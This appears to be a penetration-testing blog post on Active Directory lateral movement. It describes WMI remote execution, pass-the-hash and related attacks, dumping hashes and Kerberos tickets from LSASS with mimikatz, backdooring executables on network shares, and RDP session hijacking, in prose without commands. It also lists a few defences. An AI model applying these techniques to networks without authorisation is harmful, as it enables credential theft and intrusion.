Active Directory (Part 11.2)

By Ashwin Venugopal -

 










Lateral Movement and Pivoting

These are the general techniques used by the attackers within a network or domain. Penetration testers should make themselves familiar with these tactics. 

WMI Lateral Movement

WMI enables administrators to perform various management tasks on Windows system. It is based on the WBEM standard, an enterprise standard for management information across devices. It can be very useful for performing tasks like accessing system information, starting/stopping services and executing processes remotely. However, it can also be abused by attackers to move from one system to another within a network. 

The penetration tester can connect to WMI via PowerShell commands. WMI sessions can be established with the help of DCOM (Distributed Component Object Model) or Wsman (Web Services Management) protocols to perform various management tasks on Windows system. PowerShell and WMI technologies makes it possible to remotely spawn a process on a Windows system. Once the WMI request is sent, the process will be spawned on the remote system. Also, services or scheduled tasks can be remotely created via WMI through PowerShell. 

The MSI (Microsoft Installer) file format is used for creating installers for software applications. This can be done by sending a WMI request specifying the location of the MSI package on the target system. The file can then be copied to the target system in any way that is available to the attacker, such as via file sharing network or by exploiting a vulnerability in the system.

Alternate Authentication Material

It refers to any information that can be used to access a Windows account without knowing the user's password. The two specific protocols that can be used in this context are NTLM (NT LAM Manager) and Kerberos. 

If the penetration tester is not able to obtain clear-text passwords or easily crackable password hashes, he may end up with non-cracked NTLM ones. Although, they cannot directly use the NTLM password hash to access an account, it is possible to authenticate to a Windows domain that is configured to use NTLM authentication by using a technique known as Pass-the-Hash (PtH). This technique allows an attacker to authenticate to a domain by using the NTLM password hash of an account, without requiring the plaintext password. 

To extract NTLM hashes, the penetration tester can either use mimikatz to read the local SAM or extract hashes directly from LSASS memory. Sometimes, Kerberos tickets and session keys can be extracted from LSASS memory via mimikatz. This process generally requires the attacker to have SYSTEM privileges on the victim's machines. After extracting the desired ticket, the penetration tester can inject the tickets into the current session. After this, the tickets will be available for any tools used for lateral movement. 

Overpass-the-Hash (OtH) and Pass-the-Key (PtK) are another two attacks for gaining unauthorized access to a Windows domain. Both of them make use of hashes or keys to authenticate to a domain without the need to know the plaintext password of an account. 

Some of the methods to defend against such attacks are:
  1. Implement strong password policies.
  2. Use multi-factor authentication.
  3. Disable NTLM if possible.
  4. Secure the Kerberos authentication process.

User Behavior Abuse

Sometimes an attacker can take advantage of the actions performed by the users to gain further access to machines in the network. One possibility is finding a shortcut to a script or executable file hosted on a network share. Maintaining executables on a network share is a way to allow users to run executables on their systems without installing them. However, if an attacker writes permissions on these executables, they can potentially backdoor them and force users to execute any payload the attacker desires. When a user accesses the executables from the network share, it will be copied to their temporary folder and run on their workstation allowing the payload to be executed in the context of the user's account. This method allows the payload to be run on multiple systems without the need to install it on each one individually.

RDP hijacking is another common attack. It happens when an administrator uses Remote Desktop to connect to a machine and closes the RDP client instead of logging off, his session will remain open on the server indefinitely. Having SYSTEM privileges on Windows Server 2016 and earlier, can allow the take over of any existing RDP session without requiring a password. If a penetration tester has administrator-level access, he can get SYSTEM by a number of methods. 

Conclusion:

This part is the continuation of lateral movement and pivoting with more attack methods as well as preventions.




















































Comments

Post a Comment

Popular posts from this blog

Deployment (Part 3)

By Ashwin Venugopal -
Image
  To read part 1, please click  here To read part 2, please click  here Microsoft Monitoring Agent (MMA) MMA is used across multiple Microsoft solutions and has undergone a few name changes as its features and functionality have evolved. If it is being considered to be used, then following areas should be covered during a Microsoft Sentinel deployment project: Consider the timelines and the strategy for a migration to AMA (Azure Monitor Agent) before the MMA end-of-life.  Consider the central deployment and management methodology for MMA. Determine which endpoints are in scope for deployment as these affect the log ingestion volume significantly.  Azure Monitor Agent (AMA) Organizations with MMA as the main Microsoft Sentinel agent should start planning the migration to AMA as soon as possible to avoid a rushed migration. One of the main advantages of AMA is the ability to control the log collection policy centrally and apply different policies against different groups of computers, re
Read more

Project Resourcing (Part 2)

By Ashwin Venugopal -
Image
  To read part 1, please click  here Engineering - SIEM The SIEM engineers configures Microsoft Sentinel, including Log Analytics, Logic Apps, workbooks, and playbooks. They are also responsible for the following high-level tasks: Initial configuration of Azure tenant, including provisioning required resources, assigning access roles, and configuring workspace parameters like log retention, resource tagging, and blueprints.  Deployment and configuration of syslog/CEF log collection agents in appropriate locations to collect logs from on-premises devices. Generally, it will be joint effort of both system engineer and SIEM engineer, involving configuration and potential troubleshooting.  Working with system owners to enable log forwarding and configuring any required parsing of log data in Log Analytics.  Working with security operations to create and deploy KQL analytic rules to offer detections for SOC/Computer Security Incident Response Team (CSRIT) use. Tuning of alert rule parameter
Read more

Design Planning (Part 3)

By Ashwin Venugopal -
Image
  To read part 1, please click  here To read part 2, please click  here Complex Organizational Structures SIEM can be an expensive security control, hence, it is common multiple businesses to contribute to the overall expense. Various organizational units may require a level of access to specific dashboards or sets of data. Microsoft Sentinel offers the ability to assign table-level permissions and limit the level of access to the minimum required to perform requisite job functions.  Role-based Access Control (RBAC) Requirements Microsoft Sentinel offers an extensive list of Azure built-in roles that can be used to provide granular access according to the job requirements and permitted level of access. Some of them are various Microsoft Sentinel dedicated roles: Microsoft Sentinel Contributor- Can perform all engineering-related configuration, such as creating alert rules, configuring data connectors, and additional similar tasks.  Microsoft Sentinel Reader- Can query the log data stor
Read more